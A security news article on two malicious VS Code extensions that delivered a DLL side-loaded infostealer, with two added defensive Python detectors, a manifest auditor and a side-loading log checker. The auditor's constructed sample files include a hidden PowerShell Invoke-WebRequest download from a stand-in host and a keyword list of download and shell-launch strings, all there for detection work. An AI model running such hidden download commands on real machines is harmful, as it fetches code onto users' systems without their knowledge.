Malicious VS Code Extensions Deploy Advanced Infostealer

By Team-CWD, December 10, 2025

A new pair of malicious Visual Studio Code extensions capable of harvesting screenshots, browser sessions and stored credentials has been discovered by cybersecurity researchers.

The extensions, Bitcoin Black and Codo AI, were available on the VS Code marketplace and were observed delivering a stealthy DLL-based infostealer through an unusual combination of social engineering and technical disguise.

The malicious tools were detailed in a report published by the Koi Security research team on Monday.

Two Extensions, One Campaign

Koi said what’s new about this campaign is the way the attacker packaged the tools.

Bitcoin Black presented itself as a cryptocurrency-themed color scheme, while Codo AI offered a functional coding assistant that integrated ChatGPT and DeepSeek. Both, however, executed hidden scripts that downloaded a payload using a bundled version of the Lightshot screenshot tool paired with a malicious DLL.

The researchers found that Bitcoin Black, despite claiming to be only a theme, used activation events and PowerShell execution uncommon for legitimate themes.

Codo AI went further by providing genuine coding features, which helped the attacker avoid suspicion during installation and use.


Koi said they analyzed multiple versions of the extensions and observed rapid refinement. Version 2.5.0 relied on a complex PowerShell routine that downloaded a password-protected ZIP archive and attempted extraction through several fallback methods.

By version 3.3.0, the attacker had streamlined the delivery chain, switching to a hidden batch script that fetched an executable and DLL directly over HTTP and prevented repeated execution through a marker file.
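The behaviour the researchers flagged in Bitcoin Black (a "theme" with activation events and PowerShell execution) and the batch-script delivery chain of version 3.3.0 both show up in the extension's package contents. The audit below is an added example written for this article, not code from Koi Security or from VS Code: it parses an extension's package.json and bundled files and flags themes that declare a code entry point or activation events, or that ship scripts containing download or shell-launch strings. The manifests, script bodies and keyword list are constructed for the example.

```python
"""Audit VS Code extension manifests for themes that also execute code.

Added example, not code from the Koi Security report or from VS Code itself.
A legitimate colour theme only needs `contributes.themes`; it has no reason to
declare a `main` entry point or `activationEvents`, and its package has no
reason to contain PowerShell or batch download logic. The manifests and
script bodies below are constructed for this example.
"""
from __future__ import annotations

import json
import re

# Heuristic strings a theme package has no business containing (assumption
# made for this example; extend from your own telemetry).
SUSPECT_SCRIPT_PATTERNS = [
    r"powershell(\.exe)?\b",
    r"\bcmd(\.exe)?\s+/c\b",
    r"Invoke-WebRequest|DownloadFile|DownloadString",
    r"Expand-Archive",
    r"\brundll32\b",
]


def audit_extension(manifest: dict, files: dict[str, str] | None = None) -> dict:
    """Return {"extension": id, "reasons": [...]} for one extension.

    `manifest` is the parsed package.json; `files` maps bundled file names to
    their text so that shipped scripts can be checked as well.
    """
    ext_id = f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}"
    reasons = []
    contributes = manifest.get("contributes", {})
    is_theme = any(k in contributes for k in ("themes", "iconThemes", "productIconThemes"))
    activation = manifest.get("activationEvents", [])
    has_entry_point = "main" in manifest or "browser" in manifest

    if is_theme and has_entry_point:
        reasons.append("theme declares a code entry point (main/browser)")
    if is_theme and activation:
        reasons.append(f"theme declares activationEvents {activation}")
    if "*" in activation or "onStartupFinished" in activation:
        reasons.append("activates on every editor start")
    for fname, text in (files or {}).items():
        for pattern in SUSPECT_SCRIPT_PATTERNS:
            if re.search(pattern, text, re.IGNORECASE):
                reasons.append(f"{fname} matches /{pattern}/")
                break  # one hit per file is enough to flag it
    return {"extension": ext_id, "reasons": reasons}


def flagged_extensions(extensions: list[tuple[dict, dict]]) -> list[str]:
    """IDs of every extension with at least one finding."""
    return [r["extension"] for m, f in extensions
            if (r := audit_extension(m, f))["reasons"]]


# --- constructed sample data (not the real extensions' packages) -------------
BENIGN_THEME = json.loads("""{
  "name": "plain-dark", "publisher": "example-publisher",
  "contributes": {"themes": [{"label": "Plain Dark", "uiTheme": "vs-dark", "path": "./themes/dark.json"}]}
}""")

# A theme that also registers code and a startup activation event.
SUSPECT_THEME = json.loads("""{
  "name": "shiny-theme", "publisher": "example-publisher",
  "main": "./extension.js",
  "activationEvents": ["onStartupFinished"],
  "contributes": {"themes": [{"label": "Shiny", "uiTheme": "vs-dark", "path": "./themes/shiny.json"}]}
}""")
SUSPECT_FILES = {
    "extension.js": "const { exec } = require('child_process');\nexec('cmd.exe /c setup.bat');\n",
    "setup.bat": "@echo off\nif exist \"%TEMP%\\marker\" exit /b\npowershell -w hidden -c \"Invoke-WebRequest http://example.invalid/x\"\n",
}

# An ordinary code extension: an entry point alone is not a finding.
ASSISTANT = json.loads("""{
  "name": "helper", "publisher": "example-publisher",
  "main": "./out/extension.js", "activationEvents": ["onCommand:helper.run"],
  "contributes": {"commands": [{"command": "helper.run", "title": "Run helper"}]}
}""")

if __name__ == "__main__":
    for manifest, files in ((BENIGN_THEME, {}), (SUSPECT_THEME, SUSPECT_FILES), (ASSISTANT, {})):
        print(audit_extension(manifest, files))
```

Run it against the `package.json` files under your `~/.vscode/extensions` directory (each extension folder holds one). Only the combination of a theme contribution with an entry point, activation events or download strings raises a finding; a normal code extension with `main` and `onCommand` activation is left alone.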

The infostealer collected a wide range of information, including:

  • Clipboard contents

  • Installed programs

  • Running processes

  • Desktop screenshots

  • Stored WiFi credentials

  • Browser session data

DLL Hijacking and C2 Links

As mentioned above, the payload used DLL hijacking by pairing a legitimate Lightshot executable with the attacker’s DLL. This method allowed the malware to run under the guise of a trusted binary.

Koi Security identified command-and-control (C2) domains designed to receive exfiltrated data, along with a distinct mutex name intended to stop multiple instances from running simultaneously.
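The side-loading pattern described above (a trusted executable running from a user-writable location and loading the attacker's DLL from beside it) is visible in image-load telemetry. The detector below is an added example for this article, not code from Koi Security: it reads simplified key="value" records modelled on Sysmon Event ID 7 (ImageLoad) fields and flags unsigned DLLs loaded from a user-writable directory that is also the loading executable's own directory. The log lines, path prefixes and DLL name are constructed for the example.

```python
"""Flag DLL side-loading candidates in image-load telemetry.

Added example, not from the Koi Security report. The generic pattern behind
the campaign is an executable loading an unsigned DLL from its own directory
when that directory is user-writable. Log lines are constructed for this
example in a simplified key="value" form modelled on Sysmon Event ID 7
(ImageLoad) fields (Image, ImageLoaded, Signed); adapt the parser to your
own pipeline's format.
"""
import ntpath
import re

# Directories an ordinary user can write to (assumption for the example).
USER_WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)

_KV = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> dict:
    """Parse one key="value" log line into a dict (keys kept as written)."""
    return dict(_KV.findall(line))


def is_sideload_candidate(event: dict) -> bool:
    """True when an unsigned DLL is loaded from a user-writable directory
    that is the same directory as the loading executable.

    A missing Signed field is treated as unsigned (conservative choice).
    """
    image = event.get("Image", "").lower()
    loaded = event.get("ImageLoaded", "").lower()
    if not image or not loaded.endswith(".dll"):
        return False
    if event.get("Signed", "false").lower() == "true":
        return False
    same_dir = ntpath.dirname(image) == ntpath.dirname(loaded)
    writable = loaded.startswith(USER_WRITABLE_PREFIXES)
    return same_dir and writable


def find_sideloads(lines) -> list:
    """Return (Image, ImageLoaded) pairs, as written in the log, for every
    line that meets the side-loading heuristic."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_sideload_candidate(ev):
            hits.append((ev["Image"], ev["ImageLoaded"]))
    return hits


# Constructed sample telemetry (not real data from the campaign).
SAMPLE_LINES = [
    'EventID="7" Image="C:\\Windows\\System32\\notepad.exe" ImageLoaded="C:\\Windows\\System32\\kernel32.dll" Signed="true"',
    'EventID="7" Image="C:\\Users\\dev\\AppData\\Local\\Temp\\tools\\Lightshot.exe" ImageLoaded="C:\\Users\\dev\\AppData\\Local\\Temp\\tools\\helper.dll" Signed="false"',
    'EventID="7" Image="C:\\Users\\dev\\AppData\\Local\\Temp\\tools\\Lightshot.exe" ImageLoaded="C:\\Windows\\System32\\user32.dll" Signed="true"',
    'EventID="7" Image="C:\\Program Files\\App\\app.exe" ImageLoaded="C:\\Program Files\\App\\plugin.dll" Signed="false"',
    'EventID="7" Image="C:\\Users\\dev\\proj\\.venv\\Scripts\\python.exe" ImageLoaded="C:\\Users\\dev\\proj\\.venv\\Lib\\site-packages\\x.pyd"',
]

if __name__ == "__main__":
    for image, dll in find_sideloads(SAMPLE_LINES):
        print(f"side-load candidate: {image} loaded {dll}")
```

Of the five constructed records only the second is flagged: the unsigned DLL sits in the same temp directory as the executable that loaded it. Loads of signed system DLLs, unsigned plug-ins under Program Files (not user-writable) and non-DLL modules pass. In production, pair this with the process-creation event for the executable so that a trusted binary appearing in a temp or extension directory is itself a finding, and corroborate with the C2 domains and mutex name the researchers published.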

The researchers attributed both extensions to the same threat actor experimenting with separate lures.

“A developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents and browser sessions are being exfiltrated to a remote server,” they explained.

“At the time of writing, Codo AI is still live on the VS Code marketplace. The attack surface for developer tools continues to expand, and attackers are paying attention.”
